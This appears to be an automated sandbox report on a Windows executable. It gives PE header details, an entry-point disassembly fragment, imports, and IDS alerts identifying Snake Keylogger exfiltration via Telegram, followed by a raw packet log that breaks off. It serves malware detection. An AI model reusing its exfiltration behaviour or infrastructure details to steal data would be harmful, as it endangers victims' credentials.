File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P.._...P...P..NP.._...P...s...P...V...P..Rich.P..........................PE..L......V.................d.........

File Icon


Icon Hash:	3d2e0f95332b3399

Static PE Info

General

Entrypoint:	0x4032a0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x567F847F [Sun Dec 27 06:26:07 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	d4b94e8ee3f620a89d114b9da4b31873

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebp
push esi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+0Ch], ebp
push 00008001h
mov dword ptr [esp+0Ch], 0040A300h
mov dword ptr [esp+18h], ebp
call dword ptr [004080B0h]
call dword ptr [004080ACh]
cmp ax, 00000006h
je 00007FDAB0853083h
push ebp
call 00007FDAB08561C6h
cmp eax, ebp
je 00007FDAB0853079h
push 00000C00h
call eax
push ebx
push edi
push 0040A2F4h
call 00007FDAB0856143h
push 0040A2ECh
call 00007FDAB0856139h
push 0040A2E0h
call 00007FDAB085612Fh
push 00000009h
call 00007FDAB0856194h
push 00000007h
call 00007FDAB085618Dh
mov dword ptr [00434F04h], eax
call dword ptr [00408044h]
push ebp
call dword ptr [004082A8h]
mov dword ptr [00434FB8h], eax
push ebp
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebp
push 0042B228h
call dword ptr [0040818Ch]
push 0040A2C8h
push 00433F00h
call 00007FDAB0855D7Ah
call dword ptr [004080A8h]
mov ebx, 0043F000h
push eax
push ebx
call 00007FDAB0855D68h
push ebp
call dword ptr [00408178h]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x85c8	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x5d000	0x11e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x637c	0x6400	83ff228d6dae8dd738eb2f78afbc793f	False	0.672421875	data	6.491609540807675	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x147c	0x1600	d9f9b0b330e238260616b62a7a3cac09	False	0.42933238636363635	data	4.973928345594701	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x2aff8	0x600	3f2b05c8fbb8b2e4c9c89e93d30e7252	False	0.53125	data	4.133631086111171	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x35000	0x28000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x5d000	0x11e0	0x1200	20639f4e7c421f5379e2fb9ea4a1530d	False	0.3684895833333333	data	4.485045860065118	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_BITMAP	0x5d268	0x368	Device independent bitmap graphic, 96 x 16 x 4, image size 768	English	United States	0.23623853211009174
RT_ICON	0x5d5d0	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States	0.42473118279569894
RT_DIALOG	0x5d8b8	0x144	data	English	United States	0.5216049382716049
RT_DIALOG	0x5da00	0x13c	data	English	United States	0.5506329113924051
RT_DIALOG	0x5db40	0x100	data	English	United States	0.5234375
RT_DIALOG	0x5dc40	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x5dd60	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x5de28	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x5de88	0x14	data	English	United States	1.2
RT_MANIFEST	0x5dea0	0x33f	XML 1.0 document, ASCII text, with very long lines (831), with no line terminators	English	United States	0.5547533092659447

Imports

DLL	Import
KERNEL32.dll	SetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, LoadLibraryW, GetProcAddress, GetModuleHandleA, ExpandEnvironmentStringsW, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, GlobalFree, lstrcmpW, GlobalAlloc, WaitForSingleObject, GlobalUnlock, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, GetDC, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, LoadImageW, SetWindowLongW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, SetTimer, FindWindowExW, SendMessageTimeoutW, SetForegroundWindow
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll	RegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-17T03:29:40.007753+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	49736	142.250.186.174	443	TCP
2024-12-17T03:29:47.537292+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49738	193.122.130.0	80	TCP
2024-12-17T03:29:55.662432+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49738	193.122.130.0	80	TCP
2024-12-17T03:29:57.845766+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.4	49742	149.154.167.220	443	TCP
2024-12-17T03:29:59.302938+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49748	193.122.130.0	80	TCP
2024-12-17T03:30:01.216537+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.4	49749	149.154.167.220	443	TCP
2024-12-17T03:30:12.490733+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49755	193.122.130.0	80	TCP
2024-12-17T03:30:14.445035+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.4	49785	149.154.167.220	443	TCP
2024-12-17T03:30:22.223697+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.4	49803	149.154.167.220	443	TCP
2024-12-17T03:30:25.891903+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.4	49815	149.154.167.220	443	TCP
2024-12-17T03:30:30.827003+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.4	49827	149.154.167.220	443	TCP
2024-12-17T03:30:35.275690+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.4	49839	149.154.167.220	443	TCP
2024-12-17T03:30:38.521348+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.4	49850	149.154.167.220	443	TCP
2024-12-17T03:30:44.060895+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.4	49863	149.154.167.220	443	TCP
2024-12-17T03:30:48.646565+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.4	49875	149.154.167.220	443	TCP
2024-12-17T03:30:51.952053+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.4	49885	149.154.167.220	443	TCP
2024-12-17T03:30:56.279726+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.4	49898	149.154.167.220	443	TCP
2024-12-17T03:31:00.594692+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.4	49907	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 17, 2024 03:29:37.969741106 CET	49736	443	192.168.2.4	142.250.186.174
Dec 17, 2024 03:29:37.969830990 CET	443	49736	142.250.186.174	192.168.2.4
Dec 17, 2024 03:29:37.969939947 CET	49736	443	192.168.2.4	142.250.186.174
Dec 17, 2024 03:29:37.984253883 CET	49736	443	192.168.2.4	142.250.186.174
Dec 17, 2024 03:29:37.984292984 CET	443	49736	142.250.186.174	192.168.2.4
Dec 17, 2024 03:29:39.383753061 CET	443	49736	142.250.186.174	192.168.2.4
Dec 17, 2024 03:29:39.383860111 CET	49736	443	192.168.2.4	142.250.186.174
Dec 17, 2024 03:29:39.384829044 CET	443	49736	142.250.186.174	192.168.2.4
Dec 17, 2024 03:29:39.384933949 CET	49736	443	192.168.2.4	142.250.186.174
Dec 17, 2024 03:29:39.442950964 CET	49736	443	192.168.2.4	142.250.186.174
Dec 17, 2024 03:29:39.442996979 CET	443	49736	142.250.186.174	192.168.2.4
Dec 17, 2024 03:29:39.444035053 CET	443	49736	142.250.186.174	192.168.2.4
Dec 17, 2024 03:29:39.444129944 CET	49736	443	192.168.2.4	142.250.186.174
Dec 17, 2024 03:29:39.449559927 CET	49736	443	192.168.2.4	142.250.186.174
Dec 17, 2024 03:29:39.491362095 CET	443	49736	142.250.186.174	192.168.2.4
Dec 17, 2024 03:29:40.007719040 CET	443	49736	142.250.186.174	192.168.2.4
Dec 17, 2024 03:29:40.007865906 CET	49736	443	192.168.2.4	142.250.186.174
Dec 17, 2024 03:29:40.008379936 CET	49736	443	192.168.2.4	142.250.186.174
Dec 17, 2024 03:29:40.008465052 CET	443	49736	142.250.186.174	192.168.2.4
Dec 17, 2024 03:29:40.008574963 CET	49736	443	192.168.2.4	142.250.186.174
Dec 17, 2024 03:29:40.259785891 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:40.259881973 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:40.262403965 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:40.262403965 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:40.262480974 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:41.675635099 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:41.675743103 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:41.680320978 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:41.680335999 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:41.680752993 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:41.680823088 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:41.681176901 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:41.723350048 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.073502064 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.073599100 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.084229946 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.084335089 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.103095055 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.103190899 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.193089962 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.193209887 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.193242073 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.193310022 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.265136957 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.265234947 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.268793106 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.268865108 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.268917084 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.268985987 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.276293993 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.276374102 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.276458025 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.276509047 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.283796072 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.283871889 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.283953905 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.284014940 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.291470051 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.291543007 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.298794031 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.298890114 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.298923969 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.298974991 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.306292057 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.306364059 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.306401968 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.306461096 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.313798904 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.313853979 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.313905001 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.313958883 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.321310043 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.321398973 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.328828096 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.328948975 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.328980923 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.329041004 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.334816933 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.334882021 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.334939003 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.335002899 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.340954065 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.341029882 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.341057062 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.341131926 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.346820116 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.346880913 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.346935987 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.346995115 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.352981091 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.353061914 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.358918905 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.358988047 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.359060049 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.359121084 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.457326889 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.457482100 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.457520008 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.457595110 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.459531069 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.459585905 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.464039087 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.464122057 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.464147091 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.464210033 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.468579054 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.468653917 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.468693018 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.468755960 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.473068953 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.473148108 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.473180056 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.473242044 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.473256111 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.473313093 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.477385044 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.477461100 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.477534056 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.477590084 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.481618881 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.481690884 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.485553980 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.485618114 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.485634089 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.485696077 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.489556074 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.489644051 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.489664078 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.489726067 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.493401051 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.493501902 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.497279882 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.497340918 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.497355938 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.497416973 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.501105070 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.501192093 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.501250982 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.501302958 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.504987001 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.505074978 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.505143881 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.505208969 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.508873940 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.508938074 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.508981943 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.509031057 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.512917995 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.512994051 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.516653061 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.516746044 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.516763926 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.516830921 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.520462990 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.520529032 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.520589113 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.520747900 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.524343014 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.524442911 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.524524927 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.524584055 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.528201103 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.528284073 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.528299093 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.528363943 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.528439999 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.528496027 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.528507948 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.528532028 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.528534889 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.528558016 CET	443	49737	142.250.185.193	192.168.2.4
Dec 17, 2024 03:29:44.528583050 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.528636932 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:44.528636932 CET	49737	443	192.168.2.4	142.250.185.193
Dec 17, 2024 03:29:45.072364092 CET	49738	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:29:45.192269087 CET	80	49738	193.122.130.0	192.168.2.4
Dec 17, 2024 03:29:45.192635059 CET	49738	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:29:45.192862034 CET	49738	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:29:45.312691927 CET	80	49738	193.122.130.0	192.168.2.4
Dec 17, 2024 03:29:47.162818909 CET	80	49738	193.122.130.0	192.168.2.4
Dec 17, 2024 03:29:47.167257071 CET	49738	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:29:47.287158012 CET	80	49738	193.122.130.0	192.168.2.4
Dec 17, 2024 03:29:47.490616083 CET	80	49738	193.122.130.0	192.168.2.4
Dec 17, 2024 03:29:47.537292004 CET	49738	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:29:48.112984896 CET	49739	443	192.168.2.4	188.114.97.3
Dec 17, 2024 03:29:48.113084078 CET	443	49739	188.114.97.3	192.168.2.4
Dec 17, 2024 03:29:48.113399029 CET	49739	443	192.168.2.4	188.114.97.3
Dec 17, 2024 03:29:48.116552114 CET	49739	443	192.168.2.4	188.114.97.3
Dec 17, 2024 03:29:48.116586924 CET	443	49739	188.114.97.3	192.168.2.4
Dec 17, 2024 03:29:49.385118008 CET	443	49739	188.114.97.3	192.168.2.4
Dec 17, 2024 03:29:49.385481119 CET	49739	443	192.168.2.4	188.114.97.3
Dec 17, 2024 03:29:49.389822006 CET	49739	443	192.168.2.4	188.114.97.3
Dec 17, 2024 03:29:49.389878035 CET	443	49739	188.114.97.3	192.168.2.4
Dec 17, 2024 03:29:49.390455961 CET	443	49739	188.114.97.3	192.168.2.4
Dec 17, 2024 03:29:49.394669056 CET	49739	443	192.168.2.4	188.114.97.3
Dec 17, 2024 03:29:49.435364962 CET	443	49739	188.114.97.3	192.168.2.4
Dec 17, 2024 03:29:49.825448036 CET	443	49739	188.114.97.3	192.168.2.4
Dec 17, 2024 03:29:49.825603008 CET	443	49739	188.114.97.3	192.168.2.4
Dec 17, 2024 03:29:49.825896978 CET	49739	443	192.168.2.4	188.114.97.3
Dec 17, 2024 03:29:49.839792013 CET	49739	443	192.168.2.4	188.114.97.3
Dec 17, 2024 03:29:55.298147917 CET	49738	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:29:55.417994976 CET	80	49738	193.122.130.0	192.168.2.4
Dec 17, 2024 03:29:55.619884968 CET	80	49738	193.122.130.0	192.168.2.4
Dec 17, 2024 03:29:55.662431955 CET	49738	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:29:55.851809978 CET	49742	443	192.168.2.4	149.154.167.220
